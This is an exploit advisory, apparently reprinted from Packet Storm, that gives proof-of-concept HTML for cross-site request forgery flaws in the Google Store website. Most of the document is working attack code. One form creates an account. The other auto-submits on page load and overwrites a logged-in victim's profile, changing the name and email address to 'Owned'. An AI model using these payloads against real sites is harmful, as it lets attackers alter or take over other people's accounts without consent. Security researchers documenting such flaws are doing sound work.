Google Store suffers from multiple cross site request forgery vulnerabilities.
14d318491a70c74c8018dd2bba90fced5164c7aa0aa44092808c3d06576e3cca#
#[+]Exploiy Title: Google Store Multiple XSRF Security Vulnerabilities
#[+]Date: 26\08\2011
#[+]Author: C4SS!0 G0M3S
#[+]Vendor Link: https://www.google-store.com
#
#################################### Add User ####################################################
<body style="background-color: black; color: white;">
<form action="https://www.google-store.com/create_account.php" method="POST">
<input type="hidden" name="action" value="process"></input>
<b>First Name:</b><br><input type="text" size="50" name="firstname" value=""></input><br>
<b>Last Name:</b><br><input type="text" size="50" name="lastname" value=""></input><br>
<b>E-mail Address:</b><br><input type="text" size="50" name="email_address" value=""></input><br>
<b>Company:</b><br><input type="text" size="50" name="company" value=""></input><br>
<b>Address:</b><br><input type="text" size="50" name="street_address" value=""></input><br>
<b>Post Code:</b><br><input type="text" size="50" name="postcode" value=""></input><br>
<input type="hidden" name="country" value="30"></input>
<b>City:</b><br><input type="text" size="50" name="city" value=""></input><br>
<b>Telephone:</b><br><input type="text" size="50" name="telephone" value=""></input><br>
<b>Fax:</b><br><input type="text" size="50" name="fax" value=""></input><br>
<input type="hidden" name="newsletter" value="1"></input>
<input type="hidden" name="x" value="47"></input>
<input type="hidden" name="y" value="15"></input>
<input type="submit" value="Send Request"></input>
</form>
#################################################################################################
################################### Profile User Informations Editor ############################
<title>Google Store Profile Informations Editor CSRF Vulnerability.</title>
<body onload="con = confirm('Are You Ready'); if(con){document.send.submit()}" style="background-color:black; color: white;">
<h1>This exploit demonstrates how to exploit a CSRF flaw on the site of the Google Store.<br><br>
Steps to reproduce:<br><br>
1. Log in no <a href="https://www.google-store.com" target="_blank">Google Store</a>.<br>
2. Open this exploit and click in Ok.<br>
3. Check your profile configurations. :)<br><br>
Are You Ready?
</h1>
<form name="send" action="https://www.google-store.com/account_edit.php" method="POST">
<input type="hidden" name="action" value="process"></input>
<input type="hidden" name="firstname" value="Owned"></input>
<input type="hidden" name="lastname" value="Owned"></input>
<input type="hidden" name="email_address" value="Owned@gmail.com"></input>
<input type="hidden" name="telephone" value="123456789"></input>
<input type="hidden" name="fax" value="9876543210"></input>
<input type="hidden" name="x" value="99"></input>
<input type="hidden" name="y" value="99"></input>
</form>
#####################################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed